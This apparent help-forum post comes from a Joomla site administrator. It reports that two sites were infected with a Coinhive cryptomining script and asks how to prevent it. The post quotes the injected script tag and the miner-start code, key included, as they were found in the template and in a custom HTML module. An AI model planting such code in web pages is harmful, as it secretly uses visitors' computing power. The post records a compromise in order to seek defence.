• 1

Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!

TOPIC: Coin Miner (coinhive) attack

Coin Miner (coinhive) attack 6 years 4 months ago #37605

Hello,
Recently two websites i manage was infected by a coin miner script using coinhive.
A script was inserted in the index file of the default template and in one of the websites the attackers added the script inside a custom html module that was assigned on all pages.

Both websites was on the latest joomla version 3.8.2 with the latest RSFirewall installed.
No other suspicious files were found just the below code

<script src="coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner=new CoinHive.Anonymous('5TyEnM2ST715Tbv8nOP3uFzAoEaOXWOT');
miner.start();
</script>

Any ideas how to protect the website from this malware using RSFirewall?
How the heck did they insert the code without changing my passwords and without uploading any suspicious files?
The administrator has disabled public write access.
  • 1

Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!